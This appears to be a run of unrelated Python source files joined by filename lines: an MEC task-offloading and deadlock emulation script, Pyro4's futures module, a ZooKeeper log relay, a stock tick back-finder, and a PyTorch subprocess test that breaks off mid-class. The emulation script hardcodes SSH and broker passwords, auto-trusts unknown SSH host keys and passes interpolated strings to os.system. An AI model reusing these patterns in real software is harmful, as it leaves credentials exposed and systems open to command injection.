if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calculate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns the MEC host with the minimum average waiting time, or 0 if none is known yet
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
# count_task_sent(j)
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
offload_check[0] += 1
outward_mec += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o[0])  # count the re-offloaded tasks in this batch
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_2_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_2_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}" \
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}\n" \
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} \noff_cloud{_id_}_2_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_2_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}",
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}"
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_2_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_2_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def start_loop():
global _loc
global tasks
global t_time
global node_id
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
input('start..')
print('========= Waiting for tasks ==========')
_time_ = dt.datetime.now()
while True:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
now = dt.datetime.now()
delta = now - _time_
if delta > dt.timedelta(minutes=4):
print('terminating programme: 4 mins elapsed without receiving tasks')
stop = True  # signal helper threads to stop before breaking out
break
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = True  # signal helper threads to stop
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
print('algo stopped!')
class BrokerSend:
def __init__(self, user, pw, ip, sub_topic, data):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.response = None
self.client = mqtt.Client()
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.data = data
def publish(self):
self.client.publish(self.topic, self.data)
def __del__(self):
print('BrokerSend Object Deleted!')
def run_me(mec_no_, send_path, broker_ip_): # call this from agent
global discovering
global mec_no
global host_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
mec_no = mec_no_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
os.system(f'echo {mec_no}/{send_path} >> started.txt')
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
data = pickle.dumps([get_hostname(), host_ip])
broker_dict = {'user': 'mec', 'pw': 'password', 'sub_topic': 'control', 'ip': '192.168.122.111', 'data': data}
BrokerSend(**broker_dict).publish()
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
global hosts
global cloud_ip
# (--n, --mec_no_, --cloud_ip, --s_path, --b_ip) send_path = f'/home/mec/result/{kind}/{count}'
mec_nodes = {'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117',
'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114',
'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111',
}
gui = {'osboxes-0': '192.168.122.110'}
cloud_ips = ['192.168.200.11', '192.168.200.12']
b_ip = '192.168.122.111'
parser = argparse.ArgumentParser()
parser.add_argument('--n', type=int, default=1, help='Number of MEC nodes')
parser.add_argument('--p', type=str, default='/home/mec/result/python', help='Path to send result: homo_1')
args = parser.parse_args()
kind, count = args.p.split('_')
send_path = f'/home/mec/result/{kind}/{count}'
ho = sorted(list(mec_nodes))[:args.n - 1]
hosts = {**{host: mec_nodes[host] for host in ho if host != get_hostname()}, **gui}
ho += ['osboxes-0']
cloud_ip = cloud_ips[ho.index(get_hostname()) % 2]
os.system('clear')
run_me(mec_no_=args.n, send_path=send_path, broker_ip_=b_ip)
if __name__ == '__main__':
main()
|
futures.py
|
"""
Support for Futures (asynchronously executed callables).
If you're using Python 3.2 or newer, also see
http://docs.python.org/3/library/concurrent.futures.html#future-objects
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
from __future__ import with_statement
import sys
import functools
import logging
from Pyro4 import threadutil, util
__all__=["Future", "FutureResult", "_ExceptionWrapper"]
log=logging.getLogger("Pyro4.futures")
class Future(object):
"""
Holds a callable that will be executed asynchronously and provide its
result value some time in the future.
This is a more general implementation than the AsyncRemoteMethod, which
only works with Pyro proxies (and provides a bit different syntax).
"""
def __init__(self, callable):
self.callable = callable
self.chain = []
def __call__(self, *args, **kwargs):
"""
Start the future call with the provided arguments.
Control flow returns immediately, with a FutureResult object.
"""
chain = self.chain
del self.chain # make it impossible to add new calls to the chain once we started executing it
result=FutureResult() # notice that the call chain doesn't sit on the result object
thread=threadutil.Thread(target=self.__asynccall, args=(result, chain, args, kwargs))
thread.setDaemon(True)
thread.start()
return result
def __asynccall(self, asyncresult, chain, args, kwargs):
try:
value = self.callable(*args, **kwargs)
# now walk the callchain, passing on the previous value as first argument
for call, args, kwargs in chain:
call = functools.partial(call, value)
value = call(*args, **kwargs)
asyncresult.value = value
except Exception:
# ignore any exceptions here, return them as part of the async result instead
asyncresult.value=_ExceptionWrapper(sys.exc_info()[1])
def then(self, call, *args, **kwargs):
"""
Add a callable to the call chain, to be invoked when the results become available.
The result of the current call will be used as the first argument for the next call.
Optional extra arguments can be provided in args and kwargs.
"""
self.chain.append((call, args, kwargs))
class FutureResult(object):
"""
The result object for asynchronous calls.
"""
def __init__(self):
self.__ready=threadutil.Event()
self.callchain=[]
self.valueLock=threadutil.Lock()
def wait(self, timeout=None):
"""
Wait for the result to become available, with optional timeout (in seconds).
Returns True if the result is ready, or False if it still isn't ready.
"""
result=self.__ready.wait(timeout)
if result is None:
# older pythons return None from wait()
return self.__ready.isSet()
return result
@property
def ready(self):
"""Boolean that contains the readiness of the async result"""
return self.__ready.isSet()
def get_value(self):
self.__ready.wait()
if isinstance(self.__value, _ExceptionWrapper):
self.__value.raiseIt()
else:
return self.__value
def set_value(self, value):
with self.valueLock:
self.__value=value
# walk the call chain but only as long as the result is not an exception
if not isinstance(value, _ExceptionWrapper):
for call, args, kwargs in self.callchain:
call = functools.partial(call, self.__value)
self.__value = call(*args, **kwargs)
if isinstance(self.__value, _ExceptionWrapper):
break
self.callchain=[]
self.__ready.set()
value=property(get_value, set_value, None, "The result value of the call. Reading it will block if not available yet.")
def then(self, call, *args, **kwargs):
"""
Add a callable to the call chain, to be invoked when the results become available.
The result of the current call will be used as the first argument for the next call.
Optional extra arguments can be provided in args and kwargs.
"""
if self.__ready.isSet():
# value is already known, we need to process it immediately (can't use the callchain anymore)
call = functools.partial(call, self.__value)
self.__value = call(*args, **kwargs)
else:
# add the call to the callchain, it will be processed later when the result arrives
with self.valueLock:
self.callchain.append((call, args, kwargs))
return self
class _ExceptionWrapper(object):
"""Class that wraps a remote exception. If this is returned, Pyro will
re-throw the exception on the receiving side. Usually this is taken care of
by a special response message flag, but in the case of batched calls this
flag is useless and another mechanism was needed."""
def __init__(self, exception):
self.exception=exception
def raiseIt(self):
if sys.platform=="cli":
util.fixIronPythonExceptionForPickle(self.exception, False)
raise self.exception
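# Illustrative usage sketch (not part of the original module):
#
#   def add(x, y):
#       return x + y
#
#   def double(v):
#       return v * 2
#
#   future = Future(add)
#   future.then(double)        # chained call receives the previous result
#   result = future(1, 2)      # starts a daemon thread, returns a FutureResult
#   result.wait(5)             # optionally block (with timeout) until ready
#   print(result.value)        # 6 -- reading .value blocks until it is available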
|
log_stream.py
|
import logging
import os
import threading
import zookeeper
import sys
from twisted.internet import reactor
logger = logging.getLogger(__name__)
_installed = False
_relay_thread = None
_logging_pipe = None
def _relay_log():
global _installed, _logging_pipe
r, w = _logging_pipe
f = os.fdopen(r)
levels = dict(
ZOO_INFO = 'info',
ZOO_WARN = 'warn',
ZOO_ERROR = 'error',
ZOO_DEBUG = 'debug',
)
# this function is used as a small redirect in order to make sure that this module
# is considered the "calling module" by piped.log, and not twisted.internet.base, which
# is used if reactor.callFromThread is allowed to log directly.
def log_message(logger, message):
logger(message)
while _installed:
try:
line = f.readline().strip()
if '@' in line:
level, message = line.split('@', 1)
level = levels.get(level.split(':')[-1])
# this line is definitely misclassified in the C client....
if 'Exceeded deadline by' in line and level == 'warn':
level = 'debug'
# reclassify failed server connection attempts as INFO instead of ERROR:
if 'server refused to accept the client' in line and level == 'error':
level = 'info'
else:
level = None
message = line # TODO: can we generate a better logging message?
if not message:
continue
if level is None:
reactor.callFromThread(log_message, logger.info, message)
else:
reactor.callFromThread(log_message, getattr(logger, level), message)
except Exception as v:
logger.error('Exception occurred while relaying zookeeper log.', exc_info=True)
def is_installed():
return _installed
def install():
global _installed, _relay_thread, _logging_pipe
if is_installed():
return
_logging_pipe = os.pipe()
zookeeper.set_log_stream(os.fdopen(_logging_pipe[1], 'w'))
_installed = True
_relay_thread = threading.Thread(target=_relay_log)
_relay_thread.setDaemon(True) # die along with the interpreter
_relay_thread.start()
def uninstall():
if not is_installed():
return
global _installed, _relay_thread
_installed = False
zookeeper.set_log_stream(sys.stderr)
# TODO: make sure the thread is actually stopped
_relay_thread.join()
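# Illustrative usage sketch (not part of the module; assumes it is importable as
# `log_stream`): install() redirects the zookeeper C client's log stream through
# a pipe and relays each line to this module's logger from the reactor thread,
# while uninstall() restores sys.stderr and joins the relay thread.
#
#   import log_stream
#   log_stream.install()
#   ...  # run the twisted reactor / zookeeper client as usual
#   log_stream.uninstall()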
|
backfinder_tick.py
|
import os
import sys
import sqlite3
import pandas as pd
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import db_tick, db_backfind
from utility.static import now, strf_time
class BackFinderTick:
def __init__(self, q_, code_list_, df_mt_):
self.q = q_
self.code_list = code_list_
self.df_mt = df_mt_
self.Start()
def Start(self):
conn = sqlite3.connect(db_tick)
tcount = len(self.code_list)
for k, code in enumerate(self.code_list):
columns = ['등락율', '시가대비등락율', '고저평균대비등락율', '거래대금', '누적거래대금', '전일거래량대비',
'체결강도', '체결강도차이', '거래대금차이', '전일거래량대비차이']
df_bf = pd.DataFrame(columns=columns)
df = pd.read_sql(f"SELECT * FROM '{code}'", conn)
df = df.set_index('index')
avgtime = 300
for h, index in enumerate(df.index):
if df['현재가'][h:h + avgtime].max() > df['현재가'][index] * 1.05:
per = df['등락율'][index]
oper = round((df['현재가'][index] / df['시가'][index] - 1) * 100, 2)
hper = df['고저평균대비등락율'][index]
sm = int(df['거래대금'][index])
dm = int(df['누적거래대금'][index])
vp = df['전일거래량대비'][index]
ch = df['체결강도'][index]
gap_ch = round(df['체결강도'][index] - df['체결강도'][h - avgtime:h].mean(), 2)
gap_sm = round(df['거래대금'][index] - df['거래대금'][h - avgtime:h].mean(), 2)
gap_vp = round(df['전일거래량대비'][index] - df['전일거래량대비'][h - avgtime:h].mean(), 2)
df_bf.at[code + index] = per, oper, hper, sm, dm, vp, ch, gap_ch, gap_sm, gap_vp
print(f' BackFinder searching ... [{k + 1}/{tcount}]')
self.q.put(df_bf)
conn.close()
class Total:
def __init__(self, q_, last_):
super().__init__()
self.q = q_
self.last = last_
self.Start()
def Start(self):
df = []
k = 0
while True:
data = self.q.get()
df.append(data)
k += 1
if k == self.last:
break
if len(df) > 0:
df = pd.concat(df)
conn = sqlite3.connect(db_backfind)
df.to_sql(f"{strf_time('%Y%m%d')}_tick", conn, if_exists='replace', chunksize=1000)
conn.close()
if __name__ == "__main__":
start = now()
q = Queue()
con = sqlite3.connect(db_tick)
df_name = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df_mt = pd.read_sql('SELECT * FROM moneytop', con)
con.close()
df_mt = df_mt.set_index('index')
table_list = list(df_name['name'].values)
table_list.remove('moneytop')
last = len(table_list)
w = Process(target=Total, args=(q, last))
w.start()
procs = []
workcount = int(last / 6) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackFinderTick, args=(q, code_list, df_mt))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f' BackFinder elapsed time {end - start}')
|
test_subprocess.py
|
"""Unit tests specifically for the components of SubprocessWorker.
End-to-end tests (e.g. does SubprocessWorker properly implement the
WorkerBase API) still live in `test_worker`.
"""
import functools
import os
import sys
import textwrap
import threading
import typing
from torch.testing._internal.common_utils import TestCase, run_tests
try:
from components._impl.tasks import base as task_base
from components._impl.workers import subprocess_rpc
except (ImportError, ModuleNotFoundError):
print(f"""
This test must be run from the repo root directory as
`python -m components.test.{os.path.splitext(os.path.basename(__file__))[0]}`
""")
raise
class TestParseFunction(TestCase):
@staticmethod
def _indent(s: str) -> str:
return textwrap.indent(s, " " * 12)
def test_parse_trivial(self) -> None:
def f(x: int) -> None:
pass
_, body = task_base.parse_f(f)
self.assertExpectedInline(
self._indent(body), """\
pass""",
)
def test_parse_simple(self) -> None:
def f(
x: int,
) -> None:
for _ in range(10):
pass
_, body = task_base.parse_f(f)
self.assertExpectedInline(
self._indent(body), """\
for _ in range(10):
pass""",
)
def test_parse_inline(self) -> None:
def f(x: typing.Any, y: int = 1) -> None: print([x for _ in range(y)])
_, body = task_base.parse_f(f)
self.assertExpectedInline(
self._indent(body), """\
print([x for _ in range(y)])""",
)
def test_parse_with_comments(self) -> None:
def f(
x: int, # This is a comment
y: bool, # also a comment
# More comments.
) -> typing.Any: # Comment on return line.
"""Docstring
Note: This will be dropped in Python 3.7. See `parse_f` for details.
"""
x += 1
y = """
This is preserved.
"""
# Comment in src.
return y
_, body = task_base.parse_f(f)
# Python 3.7 removes docstring but 3.8+ doesn't. See `parse_f` for details.
docstring = """\
\"\"\"Docstring
Note: This will be dropped in Python 3.7. See `parse_f` for details.
\"\"\"\n\n""" if sys.version_info[:2] > (3,7) else ""
self.assertExpectedInline(
self._indent(body), f"""{docstring}\
x += 1
y = \"\"\"
This is preserved.
\"\"\"
# Comment in src.
return y""",
)
def test_parse_method(self) -> None:
class MyClass:
@staticmethod
def f(x: int) -> int:
"""Identity, but with more steps"""
return x
@staticmethod
def g(x: int) -> int:
"""Identity, but with more steps
Culled, as this is a multi-line docstring
"""
return x
_, body = task_base.parse_f(MyClass.f)
self.assertExpectedInline(
self._indent(body), """\
\"\"\"Identity, but with more steps\"\"\"
return x""",
)
_, body = task_base.parse_f(MyClass.g)
# Python 3.7 removes docstring but 3.8+ doesn't. See `parse_f` for details.
docstring = """\
\"\"\"Identity, but with more steps
Culled, as this is a multi-line docstring
\"\"\"\n""" if sys.version_info[:2] > (3,7) else ""
self.assertExpectedInline(
self._indent(body), f"""{docstring}\
return x""",
)
def test_parse_pathological(self) -> None:
def f(
x: \
int,
y: typing.Dict[str, int],
*,
z: str,
# Isn't that a charming (but legal) indentation?
) \
-> typing.Optional[typing.Union[
float, int]
]: # Just for good measure.
"""Begin the actual body.
(For better or worse...)
"""
del x
q = y.get(
z,
None,
)
# Intermediate comment
if False:
return 1
elif q:
raise ValueError
q = 1
_, body = task_base.parse_f(f)
# Python 3.7 removes docstring but 3.8+ doesn't. See `parse_f` for details.
docstring = """\
\"\"\"Begin the actual body.
(For better or worse...)
\"\"\"\n""" if sys.version_info[:2] > (3,7) else ""
self.assertExpectedInline(
self._indent(body), f"""{docstring}\
del x
q = y.get(
z,
None,
)
# Intermediate comment
if False:
return 1
elif q:
raise ValueError
q = 1""",
)
def test_fully_typed(self) -> None:
def f(x):
pass
with self.assertRaisesRegex(
TypeError,
"Missing type annotation for parameter `x`"
):
task_base.parse_f(f)
def g(x: int):
pass
with self.assertRaisesRegex(
TypeError,
"Missing return annotation."
):
task_base.parse_f(g)
def test_no_functor(self) -> None:
class F:
def __call__(self) -> None:
pass
with self.assertRaisesRegex(TypeError, "Expected function, got"):
task_base.parse_f(F())
def test_no_variadic(self) -> None:
def f(*args) -> None:
pass
with self.assertRaisesRegex(
TypeError,
r"Variadic positional argument `\*args` not permitted for `run_in_worker` function."
):
task_base.parse_f(f)
def g(**kwargs) -> None:
pass
with self.assertRaisesRegex(
TypeError,
r"Variadic keywork argument `\*\*kwargs` not permitted for `run_in_worker` function."
):
task_base.parse_f(g)
def test_no_decorator(self) -> None:
def my_decorator(f: typing.Callable) -> typing.Callable:
@functools.wraps(f)
def g(*args, **kwargs) -> typing.Any:
return f(*args, **kwargs)
return g
@my_decorator
def f() -> None:
pass
with self.assertRaisesRegex(
TypeError,
"`f` cannot be decorated below `@run_in_worker`"
):
task_base.parse_f(f)
class TestSubprocessRPC(TestCase):
def test_pipe_basic_read_write(self) -> None:
pipe = subprocess_rpc.Pipe()
# Test small read.
msg = b"abc"
pipe.write(msg)
self.assertEqual(msg, pipe.read())
# Test large read.
msg = b"asdjkf" * 1024
pipe.write(msg)
self.assertEqual(msg, pipe.read())
def test_pipe_stacked_read_write(self) -> None:
pipe = subprocess_rpc.Pipe()
pipe.write(b"abc")
pipe.write(b"def")
pipe.write(b"ghi")
self.assertEqual(b"abc", pipe.read())
self.assertEqual(b"def", pipe.read())
self.assertEqual(b"ghi", pipe.read())
def test_pipe_clone(self) -> None:
msg = b"msg"
pipe = subprocess_rpc.Pipe()
alt_pipe_0 = subprocess_rpc.Pipe(write_handle=pipe.write_handle)
alt_pipe_0.write(msg)
self.assertEqual(msg, pipe.read())
with self.assertRaises(IOError):
alt_pipe_0.read()
alt_pipe_1 = subprocess_rpc.Pipe(read_handle=pipe.read_handle)
pipe.write(msg)
self.assertEqual(msg, alt_pipe_1.read())
with self.assertRaises(IOError):
alt_pipe_1.write(msg)
def test_pipe_timeout(self) -> None:
result = {}
def callback():
result["callback_run"] = True
# We have to run this in a thread, because if the timeout mechanism
# fails we don't want the entire unit test suite to hang.
pipe = subprocess_rpc.Pipe(writer_pid=os.getpid(), timeout=0.5, timeout_callback=callback)
def target():
try:
pipe.read()
except Exception as e:
result["e"] = e
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
thread.join(timeout=10)
e: typing.Optional[Exception] = result.get("e", None)
self.assertIsNotNone(e)
with self.assertRaisesRegex(OSError, "Exceeded timeout: 0.5"):
raise e
self.assertTrue(result.get("callback_run", None), True)
def test_pipe_concurrent_timeout(self) -> None:
result = {"callback_count": 0, "exceptions": []}
def callback():
result["callback_count"] += 1
timeouts = [0.5, 1.0, 1.5]
pipes = [
subprocess_rpc.Pipe(writer_pid=os.getpid(), timeout=timeout, timeout_callback=callback)
for timeout in timeouts
]
def target(pipe):
try:
pipe.read()
except Exception as e:
result["exceptions"].append(e)
threads = [threading.Thread(target=target, args=(pipe,)) for pipe in pipes]
[t.start() for t in threads]
[t.join(timeout=5) for t in threads]
self.assertEqual(result["callback_count"], 3)
self.assertEqual(len(result["exceptions"]), 3)
for e in result["exceptions"]:
with self.assertRaisesRegex(OSError, "Exceeded timeout:"):
raise e
def test_pipe_cleanup(self) -> None:
assertTrue = self.assertTrue
assertFalse = self.assertFalse
del_audit = {"count": 0}
class OwnCheckingPipe(subprocess_rpc.Pipe):
def __init__(self):
super().__init__()
self._cleanup_was_run = False
assertTrue(self._owns_pipe)
def _close_fds(self) -> None:
super()._close_fds()
self._cleanup_was_run = True
def __del__(self) -> None:
super().__del__()
assert self._cleanup_was_run
del_audit["count"] += 1
class NonOwnCheckingPipe(subprocess_rpc.Pipe):
